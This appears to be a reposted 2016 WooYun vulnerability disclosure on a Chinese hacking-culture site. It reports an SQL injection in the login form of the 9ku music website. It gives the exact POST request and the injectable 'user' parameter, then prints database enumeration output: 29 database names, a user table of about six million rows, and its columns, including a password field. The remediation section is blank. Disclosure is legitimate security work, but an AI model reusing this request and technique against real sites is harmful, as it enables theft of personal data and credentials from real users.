记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

九酷音乐SQL注入漏洞(涉及600w用户)

2016-01-16 22:00

http://my.9ku.com/love/ifr_login.asp

code 区域
POST /love/ifr_login.asp HTTP/1.1

Host: my.9ku.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://my.9ku.com/love/ifr_login.asp

Cookie: ASPSESSIONIDQQRDDTCS=NKJANMLDMNOMKELEILPKHGKI

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 33





user=admin&pwd=admin&act=login&u=



user存在注入





漏洞证明:

code 区域
available databases [29]:

[*] 51weimo

[*] cc123

[*] cheguanjia

[*] jkalbumrating

[*] jkartist

[*] jkdiyalbum

[*] jkfans

[*] jkfavorite

[*] jkfm

[*] jkmmpic

[*] jkmusichistory

[*] jkmyup

[*] jkpinglun

[*] jkrecommend

[*] jkselfzj

[*] jksms

[*] jksongrating

[*] jktag

[*] jkusers

[*] jkvisitor

[*] master

[*] meinvpic

[*] model

[*] msdb

[*] OpenMusic



code 区域
Database: jkusers

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| dbo.Users | 5968982 |

| dbo.View_dates | 5940632 |

| dbo.view_users | 5940632 |

| dbo.userEmail | 2281345 |

| dbo.tempLogin | 253 |

| dbo.findpass | 80 |

| dbo.SongsCount | 18 |

| dbo.gcGongXianTop10 | 10 |

| dbo.T_Config | 4 |

| dbo.EmailTemplate | 2 |

+---------------------+---------+

Database: jkusers

Table: Users

[18 columns]

+--------------+----------+

| Column | Type |

+--------------+----------+

| BirthDay | datetime |

| City | nvarchar |

| EMail | nvarchar |

| email2 | nvarchar |

| fm_tg | int |

| fm_ty | int |

| fm_xh | int |

| IsLock | tinyint |

| lrccount | int |

| masterphoto | nvarchar |

| point1_level | int |

| point2_level | int |

| Province | nvarchar |

| RID | int |

| RName | nvarchar |

| RPwd | nvarchar |

| rthistime | datetime |

| txtcount | int |

+--------------+----------+



j3.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0157752

阅读:122052 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“九酷音乐SQL注入漏洞(涉及600w用户)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云